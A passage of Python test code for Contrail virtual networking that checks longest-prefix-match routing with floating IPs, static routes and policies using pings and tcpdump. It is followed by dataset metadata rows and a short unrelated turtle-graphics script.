vn_obj=vn2_obj, vm_name=vm3_name, project_name=self.inputs.project_name))
assert vm3_fixture.verify_on_setup()
vm2_vmi_id = vm2_fixture.cs_vmi_obj[vn1_fixture.vn_fq_name][
'virtual-machine-interface']['uuid']
add_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' + vm2_vmi_id + \
' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
self.logger.info("Create static IP for 2.2.2.0/24 pointing to vm2 ")
with settings(
host_string='%s@%s' % (
self.inputs.username, self.inputs.cfgm_ips[0]),
password=self.inputs.password, warn_only=True, abort_on_prompts=False, debug=True):
status = run('cd /opt/contrail/utils;' + add_static_route_cmd)
self.logger.debug("%s" % status)
m = re.search(r'Creating Route table', status)
assert m, 'Failed in Creating Route table'
compute_ip = vm2_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
vm2_tapintf = vm2_fixture.tap_intf[vn1_fixture.vn_fq_name]['name']
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log' % (vm2_tapintf,
vm2_tapintf)
execute_cmd(session, cmd, self.logger)
assert not(vm1_fixture.ping_to_ip(vm3_fixture.vm_ip, count='20'))
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd = 'cat /tmp/%s_out.log' % vm2_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fixture.vm_ip in output:
self.logger.info(
'Traffic is going to vm222 static ip is configured correctly')
else:
result = False
self.logger.error(
'Static ip with subnet 2.2.2.0/24 is not configured correctly')
fip_pool_name = 'test-floating-pool1'
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=vn2_fixture.vn_id))
fip_id = fip_fixture.create_and_assoc_fip(
vn2_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, vn2_fixture)
execute_cmd(session, cmd, self.logger)
if not (vm1_fixture.ping_with_certainty(vm3_fixture.vm_ip)):
result = result and False
self.logger.error(
'Longest prefix matched route is not taken floating ip ping is failing')
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd = 'cat /tmp/%s_out.log' % vm2_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fixture.vm_ip in output:
self.logger.error(
'Ping is still going to vm222 due to static route added not expected')
result = False
else:
self.logger.info(
'Route with longest prefix match is followed as expected')
del_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' + vm2_vmi_id + \
' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
self.logger.info("Delete static IP for 2.2.2.0/24 pointing to vm2 ")
with settings(
host_string='%s@%s' % (
self.inputs.username, self.inputs.cfgm_ips[0]),
password=self.inputs.password, warn_only=True, abort_on_prompts=False, debug=True):
status = run('cd /opt/contrail/utils;' + del_static_route_cmd)
self.logger.debug("%s" % status)
assert result
return True
# end test_longest_prefix_match_with_fip_and_staticroute
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_policy(self):
'''1. Create vn1 and vn2 launch vm1 in vn1 vm2 in vn2
2. Create policy between vn1 and vn2 to allow all protocols except ICMP, expect ping to fail & scp to pass from vm1 to vm2 to verify policy
3. Allocate fip from vn2 to vm1
4. Expect ping from vm1 to vm2 to pass, following longest prefix match
'''
result = True
vn1_name = 'vn111'
vn1_subnets = ['1.1.1.0/24']
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj = vn1_fixture.obj
vn2_name = 'vn222'
vn2_subnets = ['2.2.2.0/24']
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj = vn2_fixture.obj
vm1_name = 'vm111'
vm1_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm1_name, project_name=self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name = 'vm222'
vm2_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn2_obj, vm_name=vm2_name, project_name=self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up(vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up(vm2_fixture.vm_obj)
rules = [
{
'direction': '<>', 'simple_action': 'deny',
'protocol': 'icmp',
'src_ports': 'any',
'dst_ports': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
},
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'any',
'src_ports': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
'dst_ports': 'any',
},
]
policy_name = 'policy_no_icmp'
policy_fixture = self.useFixture(
PolicyFixture(
policy_name=policy_name, rules_list=rules, inputs=self.inputs,
connections=self.connections))
policy_fq_name = [policy_fixture.policy_fq_name]
vn1_fixture.bind_policies(policy_fq_name, vn1_fixture.vn_id)
self.addCleanup(vn1_fixture.unbind_policies,
vn1_fixture.vn_id, [policy_fixture.policy_fq_name])
vn2_fixture.bind_policies(policy_fq_name, vn2_fixture.vn_id)
self.addCleanup(vn2_fixture.unbind_policies,
vn2_fixture.vn_id, [policy_fixture.policy_fq_name])
vn1_fixture.verify_on_setup()
vn2_fixture.verify_on_setup()
for i in range(3):
self.logger.info("Expecting the ping to fail")
assert not (vm1_fixture.ping_to_ip(vm2_fixture.vm_ip)
), 'Failed in applying policy ping should fail as icmp is denied'
assert self.scp_files_to_vm(
vm1_fixture, vm2_fixture), 'Failed to scp file to vm '
fip_pool_name = 'test-floating-pool'
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=vn2_fixture.vn_id))
fip_id = fip_fixture.create_and_assoc_fip(
vn2_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, vn2_fixture)
if not (vm1_fixture.ping_with_certainty(vm2_fixture.vm_ip)):
self.logger.error(
'Route with longest prefix match is not followed fip ping should have passed')
result = False
assert result, 'Ping by floating ip failed'
assert self.scp_files_to_vm(
vm1_fixture, vm2_fixture), 'Failed to scp file to vm '
return True
# end test_longest_prefix_match_with_fip_and_policy
def scp_files_to_vm(self, src_vm, dst_vm):
result = True
src_vm.put_pub_key_to_vm()
dst_vm.put_pub_key_to_vm()
dest_vm_ip = dst_vm.vm_ip
file_sizes = ['1000', '1101', '1202']
for size in file_sizes:
self.logger.info("-" * 80)
self.logger.info("FILE SIZE = %sB" % size)
self.logger.info("-" * 80)
self.logger.info('Transferring the file from %s to %s using scp' %
(src_vm.vm_name, dst_vm.vm_name))
filename = 'testfile'
# Create file
cmd = 'dd bs=%s count=1 if=/dev/zero of=%s' % (size, filename)
src_vm.run_cmd_on_vm(cmds=[cmd])
# Copy key
dst_vm.run_cmd_on_vm(
cmds=['cp -f ~root/.ssh/authorized_keys ~/.ssh/'], as_sudo=True)
# Scp file from EVPN_VN_L2_VM1 to EVPN_VN_L2_VM2 using
# EVPN_VN_L2_VM2 vm's eth1 interface ip
src_vm.scp_file_to_vm(filename, vm_ip=dst_vm.vm_ip)
src_vm.run_cmd_on_vm(cmds=['sync'])
# Verify if file size is same in destination vm
out_dict = dst_vm.run_cmd_on_vm(
cmds=['ls -l %s' % (filename)])
if size in out_dict.values()[0]:
self.logger.info('File of size %s is trasferred successfully to \
%s by scp ' % (size, dest_vm_ip))
else:
self.logger.warn('File of size %s is not trasferred fine to %s \
by scp !! Pls check logs' % (size, dest_vm_ip))
result = result and False
return result
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_native_staticroute(self):
''' Test Longest prefix match when native VRF has longer prefix than FIP VRF
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vn222'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vn3_name='vn333'
vn3_subnets=['10.1.1.0/24']
vn3_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn3_name, inputs= self.inputs, subnets= vn3_subnets))
assert vn3_fixture.verify_on_setup()
vn3_obj= vn3_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn1_obj, vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_objs=[vn1_obj, vn2_obj], vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
vm3_name='vm333'
vm3_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn3_obj, vm_name= vm3_name, project_name= self.inputs.project_name))
assert vm3_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up( vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm2_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm3_fixture.vm_obj)
cmd_to_pass1=['ifconfig eth1 up']
vm2_fixture.run_cmd_on_vm(cmds=cmd_to_pass1, as_sudo=True)
sleep(10)
cmd_to_pass2=['dhclient eth1']
output=vm2_fixture.run_cmd_on_vm(cmds=cmd_to_pass2, as_sudo=True)
sleep(30)
self.logger.info("%s"%output)
vm2_eth1_ip = vm2_fixture.vm_ips[1]
vm3_vmi_id = vm3_fixture.cs_vmi_obj[vn3_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
vm2_vmi_id = vm2_fixture.cs_vmi_obj[vn1_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
add_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' +vm3_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
self.logger.info("Create static route 2.2.2.0/24 pointing to vm3 \n")
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+add_static_route_cmd)
self.logger.debug("%s"%status)
m = re.search(r'Creating Route table',status)
assert m , 'Failed in Creating Route table'
fip_pool_name= 'test-floating-pool'
fip_fixture= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name, vn_id= vn3_fixture.vn_id ))
fip_id= fip_fixture.create_and_assoc_fip(vn3_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip( fip_id, vm1_fixture, vn3_fixture)
vm1_fip = vm1_fixture.vnc_lib_h.floating_ip_read(
id=fip_id).get_floating_ip_address()
compute_ip = vm3_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm3_tapintf = vm3_fixture.tap_intf[vn3_fixture.vn_fq_name]['name']
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm3_tapintf, vm3_tapintf)
execute_cmd(session, cmd, self.logger)
assert not(vm1_fixture.ping_to_ip(vm2_eth1_ip, count='20'))
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd= 'cat /tmp/%s_out.log'%vm3_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fip in output:
self.logger.info('Traffic is going to vm333 static ip is configured correctly \n')
else:
result= result and False
self.logger.error('Static ip with subnet 2.2.2.0/24 is not configured correctly \n')
static_route_vm2= vm2_fixture.vm_ips[1] + '/' + '32'
add_static_route_cmd = 'python provision_static_route.py --prefix ' + static_route_vm2 + ' --virtual_machine_interface_id ' +vm2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
self.logger.info("Create static route %s pointing to vm111 eth0 interface \n"%static_route_vm2)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+add_static_route_cmd)
self.logger.debug("%s"%status)
execute_cmd(session, cmd, self.logger)
if not (vm1_fixture.ping_with_certainty( vm2_eth1_ip )):
result = result and False
self.logger.error('Longest prefix matched route is not taken ping using native static route is failing \n')
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd= 'cat /tmp/%s_out.log'%vm3_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fip in output:
self.logger.error('Ping is still going to vm333 problem with static route %s Longest prefix route not followed \n'%static_route_vm2)
result= result and False
else:
self.logger.info('Ping not going to vm333 as expected \n')
del_static_route_cmd1 = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' +vm3_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
del_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm2 + ' --virtual_machine_interface_id ' +vm2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
self.logger.info("Delete static IP for 2.2.2.0/24 pointing to vm333 \n")
self.logger.info("Delete static IP for %s pointing to vm111 \n"%static_route_vm2)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+del_static_route_cmd1)
self.logger.debug("%s"%status)
status= run('cd /opt/contrail/utils;'+del_static_route_cmd2)
self.logger.debug("%s"%status)
assert result , 'Failed to take route with longest prefix'
return True
#end test_longest_prefix_match_with_fip_and_native_staticroute
@preposttest_wrapper
def test_longest_prefix_match_with_2fip_different_vn_name(self):
''' Allocate 2 FIP from different VN. Both the Floating VN should push same route. VM should take the route for the VN based on destination vn name (smaller dict name)
FIP is allocated from vnaaa and vnbbb and both push same route so traffic is expected on interface associated with vnaaa
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vnaaa'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vn3_name='vnbbb'
vn3_subnets=['3.3.3.0/24']
vn3_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn3_name, inputs= self.inputs, subnets= vn3_subnets))
assert vn3_fixture.verify_on_setup()
vn3_obj= vn3_fixture.obj
vn4_name='vn444'
vn4_subnets=['4.4.4.0/24']
vn4_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn4_name, inputs= self.inputs, subnets= vn4_subnets))
assert vn4_fixture.verify_on_setup()
vn4_obj= vn4_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_objs=[vn1_obj, vn2_obj, vn3_obj], vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn4_obj, vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up( vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm2_fixture.vm_obj)
cmd_to_pass1=['ifconfig eth1 up']
vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass1, as_sudo=True)
sleep(10)
cmd_to_pass2=['ifconfig eth2 up']
vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass2, as_sudo=True)
sleep(10)
cmd_list= 'dhclient eth1;dhclient eth2'
cmd_to_pass=[cmd_list]
output=vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass, as_sudo=True)
sleep(30)
vm1_eth1_vmi_id = vm1_fixture.cs_vmi_obj[vn2_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
vm1_eth2_vmi_id = vm1_fixture.cs_vmi_obj[vn3_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
static_route_vm1_eth0 = vm1_fixture.vm_ip + '/' + '32'
add_static_route_cmd1 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth1_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table1'
add_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table2'
self.logger.info("Create static route %s pointing to eth0 of vm1 \n"%static_route_vm1_eth0)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status1= run('cd /opt/contrail/utils;'+add_static_route_cmd1)
self.logger.debug("%s"%status1)
m = re.search(r'Creating Route table',status1)
assert m , 'Failed in Creating Route table'
status2= run('cd /opt/contrail/utils;'+add_static_route_cmd2)
self.logger.debug("%s"%status2)
m = re.search(r'Creating Route table',status2)
assert m , 'Failed in Creating Route table'
fip_pool_name1= 'test-floating-pool1'
fip_fixture1= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name1, vn_id= vn2_fixture.vn_id ))
fip_id1= fip_fixture1.create_and_assoc_fip(vn2_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip( fip_id1, vm2_fixture, vn2_fixture)
vm2_fip1 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id1).get_floating_ip_address()
fip_pool_name2= 'test-floating-pool2'
fip_fixture2= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name2, vn_id= vn3_fixture.vn_id ))
fip_id2= fip_fixture2.create_and_assoc_fip(vn3_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip( fip_id2, vm2_fixture, vn3_fixture)
vm2_fip2 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id2).get_floating_ip_address()
compute_ip = vm1_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm1_tapintf_eth1 = vm1_fixture.tap_intf[vn2_fixture.vn_fq_name]['name']
vm1_tapintf_eth2 = vm1_fixture.tap_intf[vn3_fixture.vn_fq_name]['name']
cmd1 = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf_eth1, vm1_tapintf_eth1)
cmd2 = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf_eth2, vm1_tapintf_eth2)
execute_cmd(session, cmd1, self.logger)
execute_cmd(session, cmd2, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd1= 'cat /tmp/%s_out.log'%vm1_tapintf_eth1
output_cmd2= 'cat /tmp/%s_out.log'%vm1_tapintf_eth2
output1, err = execute_cmd_out(session, output_cmd1, self.logger)
output2, err = execute_cmd_out(session, output_cmd2, self.logger)
print output1
print output2
if vm2_fip1 in output1:
self.logger.info('Traffic is going through vm111 eth1 interface as the vn name (vnaaa) is smaller here, longest prefix match is followed \n')
else:
result= result and False
self.logger.error('Traffic is not going through vm111 eth1 interface though vn name is smaller here, not expected \n \n')
if vm2_fip2 in output2:
self.logger.error('Traffic is going through vm111 eth2 interface not expected \n')
result= result and False
else:
self.logger.info('Traffic is not going through vm111 eth2 interface since associated vn name (vnbbb) is greater than vnaaa, longest prefix match followed \n')
del_static_route_cmd1 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth1_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table1'
del_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table2'
self.logger.info("Delete static route %s pointing to eth0 of vm1 \n"%static_route_vm1_eth0)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status1= run('cd /opt/contrail/utils;'+del_static_route_cmd1)
self.logger.debug("%s"%status1)
status2= run('cd /opt/contrail/utils;'+del_static_route_cmd2)
self.logger.debug("%s"%status2)
assert result , 'Longest prefix match rule not followed'
return True
# end test_longest_prefix_match_with_2fip_different_vn_name
@preposttest_wrapper
def test_longest_prefix_match_with_two_fips_from_same_vn(self):
''' Allocate 2 FIP from same Vn. VM should choose the path with lower IP address.
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vn222'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn1_obj, vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn2_obj, vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
fip_pool_name= 'test-floating-pool'
fip_fixture= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name, vn_id= vn1_fixture.vn_id ))
fip_id1= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
fip_id2= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id2)
assert fip_fixture.verify_fip( fip_id1, vm2_fixture, vn1_fixture)
assert fip_fixture.verify_fip( fip_id2, vm2_fixture, vn1_fixture)
vm2_fip1 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id1).get_floating_ip_address()
vm2_fip2 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id2).get_floating_ip_address()
compute_ip = vm1_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm1_tapintf = vm1_fixture.tap_intf[vn1_fixture.vn_fq_name]['name']
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf, vm1_tapintf)
execute_cmd(session, cmd, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd= 'cat /tmp/%s_out.log'%vm1_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm2_fip1 > vm2_fip2:
smaller_fip = vm2_fip2
else:
smaller_fip = vm2_fip1
if smaller_fip in output:
self.logger.info('Traffic is send using smaller fip when 2 fips are allocated from same vn as expected \n')
else:
result= result and False
self.logger.error('Traffic is not send using smaller fip when 2 fips are allocated from same vn, not expected \n')
fip_id3= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id3)
assert fip_fixture.verify_fip( fip_id3, vm2_fixture, vn1_fixture)
vm2_fip3 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id3).get_floating_ip_address()
fip_fixture.disassoc_and_delete_fip(fip_id1)
execute_cmd(session, cmd, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd= 'cat /tmp/%s_out.log'%vm1_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm2_fip2 > vm2_fip3:
smaller_fip = vm2_fip3
else:
smaller_fip = vm2_fip2
if smaller_fip in output:
self.logger.info('Traffic is send using smaller fip when 2 fips are allocated from same vn as expected \n')
else:
result= result and False
self.logger.error('Traffic is not send using smaller fip when 2 fips are allocated from same vn, not expected \n')
assert result, 'Longest prefix match rule is not followed'
return True
#end test_longest_prefix_match_with_two_fips_from_same_vn
| 47.944651
| 275
| 0.650639
| 17,012
| 129,067
| 4.614507
| 0.044204
| 0.032483
| 0.025668
| 0.034904
| 0.847902
| 0.821979
| 0.790031
| 0.762707
| 0.739994
| 0.715001
| 0
| 0.031429
| 0.264134
| 129,067
| 2,691
| 276
| 47.962467
| 0.795117
| 0.055475
| 0
| 0.720167
| 0
| 0.006013
| 0.135292
| 0.006667
| 0.001388
| 0
| 0
| 0
| 0.109158
| 0
| null | null | 0.016651
| 0.011563
| null | null | 0.005088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
82cbeaad1bd0af0a257442d8a46b77a4bd877c86
| 272
|
py
|
Python
|
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
from turtle import*
def krzy():
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
krzy()
| 12.952381
| 19
| 0.452206
| 54
| 272
| 2.277778
| 0.185185
| 0.390244
| 0.536585
| 0.520325
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0
| 0.253968
| 0.305147
| 272
| 20
| 20
| 13.6
| 0.396825
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| true
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
7d9852bef58c253e3658c595a87fcb0d287f8920
| 132
|
py
|
Python
|
LIDG_v0.2/lidg/model_selection/__init__.py
|
Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | 6
|
2019-09-10T00:22:05.000Z
|
2022-02-21T04:30:36.000Z
|
LIDG_v0.3/lidg/model_selection/__init__.py
|
